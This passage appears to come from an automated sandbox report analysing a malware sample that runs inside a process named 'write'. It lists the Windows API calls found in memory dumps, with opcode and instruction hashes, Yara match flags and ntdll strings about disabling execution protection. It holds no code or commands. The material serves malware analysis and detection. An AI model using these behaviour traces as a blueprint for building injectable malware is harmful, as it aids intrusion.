                                                                      • Instruction ID: da600f51e2fae6803dd29850f79952b45102cb105207a6f5216ee8239e6ed091
                                                                      • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                                      • Instruction Fuzzy Hash: A8011EB5D0020DABDF10EBE4DC41F9EB77A9B54748F044195EA0997280F631EB588B92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(02FD08D1,02FD08F9,02FD06D1,00000000,02FD76E3,00000010,02FD08F9,?,?,00000044,02FD08F9,00000010,02FD76E3,00000000,02FD06D1,02FD08F9), ref: 02FE7DB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: 26bf6c0ac43dd4f6eb8427051f867902da362af5a5b8e71734b3d9186bd69496
                                                                      • Instruction ID: 419bf70cf2cdf2aafd3f87db47694ee7640a0f8451ee030e6e3db8ad72543122
                                                                      • Opcode Fuzzy Hash: 26bf6c0ac43dd4f6eb8427051f867902da362af5a5b8e71734b3d9186bd69496
                                                                      • Instruction Fuzzy Hash: 6501D2B2200108BBCB54DF89DC80EEB77AEAF8C754F118208FA0DE3240D630F9518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02FC92B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: ab77701553b859adecd912b2d8f5d8dcd5db8c9dcec13d680050f48e2300a713
                                                                      • Instruction ID: bebfaa2b9d1468c8048c97e9ef153d964da276ad2e122a52e525bf88c192b64d
                                                                      • Opcode Fuzzy Hash: ab77701553b859adecd912b2d8f5d8dcd5db8c9dcec13d680050f48e2300a713
                                                                      • Instruction Fuzzy Hash: 46F06D7338060536E63065A99C02FDBB68C8B85BB1F250029F70DEB1C0D9A1B4014AE8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D333D0,00000007,00000000,00000004,00000000,02FD36F5,000000F4,?,?,?,?,?), ref: 02FE7CFC
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 97e2ecbea5990f95f6fc3c6edd0d89ef4c800d19eef77a2212d248aa381b5c4d
                                                                      • Instruction ID: 39ff7aecdf877378ebe7db8f052baa901b1fd037b5a7a0e48173b2ac43de2e3f
                                                                      • Opcode Fuzzy Hash: 97e2ecbea5990f95f6fc3c6edd0d89ef4c800d19eef77a2212d248aa381b5c4d
                                                                      • Instruction Fuzzy Hash: 96E092722002447FC610EF59DC41F9B33AEEFC5B50F104009FA19A7241C630B8208BB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(02FD1039,?,02FE47FB,02FD1039,02FE4047,02FE47FB,?,02FD1039,02FE4047,00001000,?,?,02FE9530), ref: 02FE7CAC
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: b90c0de5a4d80dcbe5b5e6c92ba5387db1652cddc6225f28b85bea434ea8f0c4
                                                                      • Instruction ID: 535eeaccf8de7b836ead648550ae78a758da2a9f181e216f4a374b7e4cb22d33
                                                                      • Opcode Fuzzy Hash: b90c0de5a4d80dcbe5b5e6c92ba5387db1652cddc6225f28b85bea434ea8f0c4
                                                                      • Instruction Fuzzy Hash: 4EE09AB62003447BCA14EF59DC40FAB37AEEFC97A0F008408FA09A7241C670B911CBB4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 02FD774C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 4ae078f003bec17eb87b38b28ba8f756c2df8c8c5b682859e84c4d605638c665
                                                                      • Instruction ID: 690f97e137674e18da24b95602134fd7a2f815b27d01e29dd88085b668c80eaf
                                                                      • Opcode Fuzzy Hash: 4ae078f003bec17eb87b38b28ba8f756c2df8c8c5b682859e84c4d605638c665
                                                                      • Instruction Fuzzy Hash: C2E086756402082BEB24BBB8DC45F67335D8B48768F6C4A64BA2CDF2C2E7B9F5018590
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111), ref: 02FD0497
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                      • Instruction ID: 42fbae05728d5bbec317ec65c9b6137a8c475e68b6843a226f183365ae4c76cd
                                                                      • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                      • Instruction Fuzzy Hash: 1ED0A967B0100C3AAA024584ACC1DFEB72CEB85AAAF008067FB08E2040EA2199020AB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02FD1320,02FE6767,02FE4047,?), ref: 02FD7563
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 6a8d178d3d234bf6025c2b9a5e22f122deead6d607a8f2843ef2f5ba8ad43eb1
                                                                      • Instruction ID: e0b4f009a1f7eb78f3470d4827c46d3db1f76e743d3526bb7dda8a5f2db6e37a
                                                                      • Opcode Fuzzy Hash: 6a8d178d3d234bf6025c2b9a5e22f122deead6d607a8f2843ef2f5ba8ad43eb1
                                                                      • Instruction Fuzzy Hash: 33D017A1A842056AEA00B6A48D06F1B368E8B44794F294069BB08EA283E965E1108966
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02FD1320,02FE6767,02FE4047,?), ref: 02FD7563
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 054af324eb2d800055faf65f5f2dbfc0cbfc01b632334b845d64c15ca5920664
                                                                      • Instruction ID: 37a3dc83f104c3cf55c3c9bdd59f629cd9614f07311b8026acc04381f92182f1
                                                                      • Opcode Fuzzy Hash: 054af324eb2d800055faf65f5f2dbfc0cbfc01b632334b845d64c15ca5920664
                                                                      • Instruction Fuzzy Hash: 94E012B16801016EE710B6B49D0AF6B375D9B44345F154079B609DA282ED65A1108A15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 0e3d10042694b31c280a05775a6cb22d9a3da217d0fed2ef8a9c1df4ffe5ccf9
                                                                      • Instruction ID: b90b2ff5e5d1132ae27c0a5444ae3dd7f1fd7c3eb64afb26a240f266c814e523
                                                                      • Opcode Fuzzy Hash: 0e3d10042694b31c280a05775a6cb22d9a3da217d0fed2ef8a9c1df4ffe5ccf9
                                                                      • Instruction Fuzzy Hash: 02B09B71D124C5C5DB11E760474CB2779517FD0701F56C456D1460685F4778C091F175
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05234460
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 05234592
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05234507
                                                                      • ExecuteOptions, xrefs: 052344AB
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0523454D
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05234530
                                                                      • Execute=1, xrefs: 0523451E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      • Opcode ID: 0ffcb2bd1b6fb9d5a8a5242edb9f1976d6c34e48390239db02b1fafc60029f2a
                                                                      • Instruction ID: 201c0e91a386596d8dfc0347bee0e40e5ab51498a61b10d98bb2a6b83c3fa0da
                                                                      • Opcode Fuzzy Hash: 0ffcb2bd1b6fb9d5a8a5242edb9f1976d6c34e48390239db02b1fafc60029f2a
                                                                      • Instruction Fuzzy Hash: C6510971B502197AEF25EA94EC8DFB973A9FF08310F0404A9E606A71D1EB709E45CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17956660882.0000000005190000.00000040.00001000.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                                                      • Associated: 00000005.00000002.17956660882.00000000052B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000005.00000002.17956660882.00000000052BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_5190000_write.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280
                                                                      • Opcode ID: 29b00da5564272dba38341cd9000f397c3320fca2a1c041dea9f81213278df32
                                                                      • Instruction ID: b168b05dcd8fb62eabb19220defcc3c85d1e1f4307f2fea95f47c7711445ec2d
                                                                      • Opcode Fuzzy Hash: 29b00da5564272dba38341cd9000f397c3320fca2a1c041dea9f81213278df32
                                                                      • Instruction Fuzzy Hash: 89811A75D10269DBDB35CB54CC45BEEBAB8AF48710F0041EAE90AB7290D7719E85CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%